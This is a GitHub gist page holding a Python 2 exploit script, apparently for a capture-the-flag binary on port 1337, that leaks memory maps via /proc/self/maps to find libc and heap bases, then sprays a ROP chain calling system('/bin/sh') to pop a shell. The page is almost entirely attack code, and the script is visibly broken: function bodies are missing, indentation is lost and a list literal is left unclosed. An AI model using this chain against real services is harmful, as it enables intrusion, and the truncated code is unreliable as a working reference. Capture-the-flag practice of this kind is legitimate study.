Skip to content

Instantly share code, notes, and snippets.

What would you like to do?
from Pwn import *
import re
def add_skeleton(skeleton):
d = p.read_until('\x1b[0;31;49m[q]\x1b[0muit')
p.read_until('so... what do you say to mr skeletal?\n')
r = p.read_until('im going to steal all ur calcuims')
if 'im going to steal all ur calcuims' in r:
return True
return False
def add_meme():
def getBaseAddress():
pl = '/proc/self/maps'.encode('base64')
p.read_until('ok, let me know your order number bro:')
leak = p.read_until('rint receipt from confirmation number')
match = re.findall(r'([0-9a-f]*\-[0-9a-f]*)',leak)
heap_base = int(match[10].split('-')[0],16)
libc_base = int(match[199].split('-')[0],16)
return libc_base,heap_base
# 0x00000000000b25d5 : add byte ptr [rcx], bh ; ror dword ptr [rdi], 1 ; xchg eax, esp ; ret
# 0x0000000000022b1a : pop rdi ; ret
# 0x000000000001f7a6 : pop rdi ; pop rbp ; ret
def exploit():
# start_offset = 0x10
global p
start = 233930608
p = Pwn(mode=1,host='',port=1337)
# p = Pwn(mode=1,port=8888)
# raw_input('> ')
libc_base,heap_base = getBaseAddress()
print '[+] Libc base:',hex(libc_base)
print '[+] Heap base:',hex(heap_base)
# print '[!!!!] Offset',start
# addr = int(raw_input('> '),16)
pl = ''
pl+= pA([
libc_base + 0x1f7a6, # pop rdi ; pop rbp ; ret - skip me when stack is changed
libc_base + 0xb25d5, # add byte ptr [rcx], bh ; ror dword ptr [rdi], 1 ; xchg eax, esp ; ret
heap_base + start, # don't care
libc_base + 0x22b1a, # pop rdi ; ret
libc_base + 0x17ccdb, # "/bin/sh"
libc_base + 0x46640 # system
pl+='C'*(280 - len(pl))
for i in xrange(256):
print 'Add skeleton',(i+1)
if not add_skeleton(pl):
print 'Failed'
return 1
p.write('c\n') # trigger bug
# start_offset+=280
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
You can’t perform that action at this time.
You signed in with another tab or window. Reload to refresh your session. You signed out in another tab or window. Reload to refresh your session.